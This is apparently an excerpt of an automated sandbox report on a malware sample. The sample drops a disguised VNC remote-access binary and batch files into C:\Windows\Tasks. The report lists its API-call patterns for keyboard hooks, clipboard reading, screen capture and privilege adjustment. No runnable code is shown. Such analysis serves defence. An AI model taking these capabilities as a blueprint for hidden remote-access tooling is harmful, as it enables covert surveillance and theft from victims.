                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00408630 SetWindowsHookExW 00000002,Function_00008602,00000000,000000000_2_00408630
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C31AE0 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,CloseClipboard,24_2_00007FF790C31AE0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C613A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,24_2_00007FF790C613A0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C31DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,24_2_00007FF790C31DD0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C613A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,28_2_00007FF790C613A0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C31DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,28_2_00007FF790C31DD0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C31AE0 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,CloseClipboard,24_2_00007FF790C31AE0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C5F980 EnumDisplaySettingsA,LoadLibraryA,GetProcAddress,ReleaseDC,DeleteDC,CreateDCA,EnumDisplaySettingsA,FreeLibrary,EnumWindows,GetDC,CreateCompatibleDC,GetLastError,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,GetLastError,GetDIBits,GetDIBits,GetDeviceCaps,InvalidateRect,24_2_00007FF790C5F980
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C531B0 GetKeyboardState,24_2_00007FF790C531B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C474C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,24_2_00007FF790C474C0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C474C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,28_2_00007FF790C474C0
                            Source: C:\Windows\Tasks\browser_sn.exeProcess Stats: CPU usage > 49%
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C42E40 OpenSCManagerA,OpenServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,24_2_00007FF790C42E40
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C4A130 GetVersionExA,OpenInputDesktop,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,SetThreadDesktop,OpenProcess,OpenProcessToken,CloseHandle,GetModuleFileNameA,CreateProcessAsUserA,GetLastError,CloseHandle,CloseHandle,OpenEventA,SetEvent,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,OpenEventA,SetEvent,GetModuleFileNameA,GetDesktopWindow,ShellExecuteA,InitializeCriticalSection,Sleep,SetThreadDesktop,CloseDesktop,24_2_00007FF790C4A130
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C434B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,24_2_00007FF790C434B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C43550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,24_2_00007FF790C43550
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C434B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,28_2_00007FF790C434B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C43550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,28_2_00007FF790C43550
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\3889122.Khe9oLYJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\9655269573Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\DygIR.vkc0fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\go3uE.OUJMAJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\uqVb3.kkb9hJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Xv6Ya.d8LhTJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\9655269573.cmdJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\3889122.cmdJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\browser_sn.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\UltraVNC.iniJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\conhost.exeJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_004057210_2_00405721
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_004139D10_2_004139D1
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00413AAB0_2_00413AAB
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_004133700_2_00413370
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00413D430_2_00413D43
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_0040AD300_2_0040AD30
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C536D024_2_00007FF790C536D0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C379E924_2_00007FF790C379E9
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790CF09F024_2_00007FF790CF09F0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C3420024_2_00007FF790C34200
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C381AD24_2_00007FF790C381AD
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C3E1D024_2_00007FF790C3E1D0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C551B724_2_00007FF790C551B7
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C3517024_2_00007FF790C35170
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C5F98024_2_00007FF790C5F980
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C4898024_2_00007FF790C48980
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C4693024_2_00007FF790C46930
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C4A13024_2_00007FF790C4A130
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C5D15024_2_00007FF790C5D150
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C5AB1024_2_00007FF790C5AB10
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C37B0424_2_00007FF790C37B04
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C37A9A24_2_00007FF790C37A9A
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C37ACF24_2_00007FF790C37ACF
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790CA12C024_2_00007FF790CA12C0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C5C2C024_2_00007FF790C5C2C0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C4027024_2_00007FF790C40270
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C3227024_2_00007FF790C32270
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C58A7024_2_00007FF790C58A70
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C37A5B24_2_00007FF790C37A5B
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C33A9024_2_00007FF790C33A90
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C55A3324_2_00007FF790C55A33
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C37A1C24_2_00007FF790C37A1C
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790CE725024_2_00007FF790CE7250
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C5623E24_2_00007FF790C5623E
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C37BE224_2_00007FF790C37BE2
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C493E024_2_00007FF790C493E0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C44C1024_2_00007FF790C44C10
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790CEE40024_2_00007FF790CEE400
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C5739B24_2_00007FF790C5739B
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C37BA624_2_00007FF790C37BA6
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C4B3D024_2_00007FF790C4B3D0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C56BBD24_2_00007FF790C56BBD
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C37B7124_2_00007FF790C37B71
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C47B9024_2_00007FF790C47B90
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C3439024_2_00007FF790C34390
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C4BB8024_2_00007FF790C4BB80
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C6033024_2_00007FF790C60330
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C37B3724_2_00007FF790C37B37
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C3DCF024_2_00007FF790C3DCF0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C5DCF024_2_00007FF790C5DCF0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C61CE024_2_00007FF790C61CE0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C41D1024_2_00007FF790C41D10
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C654A024_2_00007FF790C654A0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C65CA024_2_00007FF790C65CA0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C52CC024_2_00007FF790C52CC0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790CF2C7024_2_00007FF790CF2C70
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C6346024_2_00007FF790C63460
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790CF8C9024_2_00007FF790CF8C90
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C5A42024_2_00007FF790C5A420
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C48E1024_2_00007FF790C48E10
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C4E61024_2_00007FF790C4E610
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C4C5B024_2_00007FF790C4C5B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C31DD024_2_00007FF790C31DD0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C56DD124_2_00007FF790C56DD1
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C4859024_2_00007FF790C48590
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C54D7E24_2_00007FF790C54D7E
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C4AD3024_2_00007FF790C4AD30
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C5AE7024_2_00007FF790C5AE70
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C6166024_2_00007FF790C61660
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790CF068C24_2_00007FF790CF068C
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C34E8024_2_00007FF790C34E80
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C63E2024_2_00007FF790C63E20
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C5162024_2_00007FF790C51620
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C5265024_2_00007FF790C52650
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C8065024_2_00007FF790C80650
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C3C81024_2_00007FF790C3C810
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C3377024_2_00007FF790C33770
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C4AF6024_2_00007FF790C4AF60
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790CEDF8024_2_00007FF790CEDF80
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C5E78024_2_00007FF790C5E780
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C4974024_2_00007FF790C49740
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C420E024_2_00007FF790C420E0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C3A91024_2_00007FF790C3A910
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C4110024_2_00007FF790C41100
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C470B024_2_00007FF790C470B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C4C8D024_2_00007FF790C4C8D0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C5A87024_2_00007FF790C5A870
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C4A89024_2_00007FF790C4A890
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C4C09024_2_00007FF790C4C090
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C3188024_2_00007FF790C31880
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C379E928_2_00007FF790C379E9
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790CF09F028_2_00007FF790CF09F0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C3420028_2_00007FF790C34200
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C381AD28_2_00007FF790C381AD
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C3E1D028_2_00007FF790C3E1D0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C551B728_2_00007FF790C551B7
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C3517028_2_00007FF790C35170
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C5F98028_2_00007FF790C5F980
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C4898028_2_00007FF790C48980
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C4693028_2_00007FF790C46930
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C4A13028_2_00007FF790C4A130
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C5D15028_2_00007FF790C5D150
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C5AB1028_2_00007FF790C5AB10
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C37B0428_2_00007FF790C37B04
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C37A9A28_2_00007FF790C37A9A
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C37ACF28_2_00007FF790C37ACF
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790CA12C028_2_00007FF790CA12C0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C5C2C028_2_00007FF790C5C2C0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C4027028_2_00007FF790C40270
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C3227028_2_00007FF790C32270
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C58A7028_2_00007FF790C58A70
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C37A5B28_2_00007FF790C37A5B
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C33A9028_2_00007FF790C33A90
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C55A3328_2_00007FF790C55A33
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C37A1C28_2_00007FF790C37A1C
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790CE725028_2_00007FF790CE7250
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C5623E28_2_00007FF790C5623E
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C37BE228_2_00007FF790C37BE2
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C493E028_2_00007FF790C493E0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C44C1028_2_00007FF790C44C10
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790CEE40028_2_00007FF790CEE400
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C5739B28_2_00007FF790C5739B
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C37BA628_2_00007FF790C37BA6
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C4B3D028_2_00007FF790C4B3D0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C56BBD28_2_00007FF790C56BBD
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C37B7128_2_00007FF790C37B71
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C47B9028_2_00007FF790C47B90
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C3439028_2_00007FF790C34390
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C4BB8028_2_00007FF790C4BB80
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C6033028_2_00007FF790C60330
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C37B3728_2_00007FF790C37B37
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C3DCF028_2_00007FF790C3DCF0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C5DCF028_2_00007FF790C5DCF0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C61CE028_2_00007FF790C61CE0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C41D1028_2_00007FF790C41D10
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C654A028_2_00007FF790C654A0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C65CA028_2_00007FF790C65CA0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790CF2C7028_2_00007FF790CF2C70
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C6346028_2_00007FF790C63460
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790CF8C9028_2_00007FF790CF8C90
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C5A42028_2_00007FF790C5A420
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C52DF328_2_00007FF790C52DF3
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C48E1028_2_00007FF790C48E10
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C4E61028_2_00007FF790C4E610
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C4C5B028_2_00007FF790C4C5B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C31DD028_2_00007FF790C31DD0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C56DD128_2_00007FF790C56DD1
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C4859028_2_00007FF790C48590
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C54D7E28_2_00007FF790C54D7E
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C4AD3028_2_00007FF790C4AD30
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C536D028_2_00007FF790C536D0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C5AE7028_2_00007FF790C5AE70
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C6166028_2_00007FF790C61660
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790CF068C28_2_00007FF790CF068C
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C34E8028_2_00007FF790C34E80
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C63E2028_2_00007FF790C63E20
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C5162028_2_00007FF790C51620
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C5265028_2_00007FF790C52650
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C8065028_2_00007FF790C80650
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C3C81028_2_00007FF790C3C810
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C3377028_2_00007FF790C33770
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C4AF6028_2_00007FF790C4AF60
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790CEDF8028_2_00007FF790CEDF80
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C5E78028_2_00007FF790C5E780
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C4974028_2_00007FF790C49740
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C420E028_2_00007FF790C420E0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C3A91028_2_00007FF790C3A910
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C4110028_2_00007FF790C41100
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C470B028_2_00007FF790C470B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C4C8D028_2_00007FF790C4C8D0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C5A87028_2_00007FF790C5A870
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C4A89028_2_00007FF790C4A890
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C4C09028_2_00007FF790C4C090
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C3188028_2_00007FF790C31880
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: String function: 004026B0 appears 38 times
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: String function: 00007FF790CE7C50 appears 60 times
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: String function: 00007FF790CE9500 appears 42 times
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: String function: 00007FF790C3AE30 appears 34 times
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: String function: 00007FF790C9A3B0 appears 38 times
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: String function: 00007FF790CE70B4 appears 56 times
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: String function: 00007FF790C33730 appears 730 times
                            Source: Xv6Ya.d8LhT.0.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                            Source: Xv6Ya.d8LhT.0.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                            Source: Xv6Ya.d8LhT.2.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                            Source: Xv6Ya.d8LhT.2.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                            Source: browser_sn.exe.8.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                            Source: browser_sn.exe.8.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000296C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinVNC.exe0 vs T8xrZb7nBL.exe
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1289507685.00000000025A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebrowser.exe( vs T8xrZb7nBL.exe
                            Source: T8xrZb7nBL.exe, 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebrowser.exe( vs T8xrZb7nBL.exe
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1294187731.000000000096B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinVNC.exe0 vs T8xrZb7nBL.exe
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1291956543.00000000027A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCONHOST.EXEj% vs T8xrZb7nBL.exe
                            Source: T8xrZb7nBL.exeBinary or memory string: OriginalFilenamebrowser.exe( vs T8xrZb7nBL.exe
                            Source: T8xrZb7nBL.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
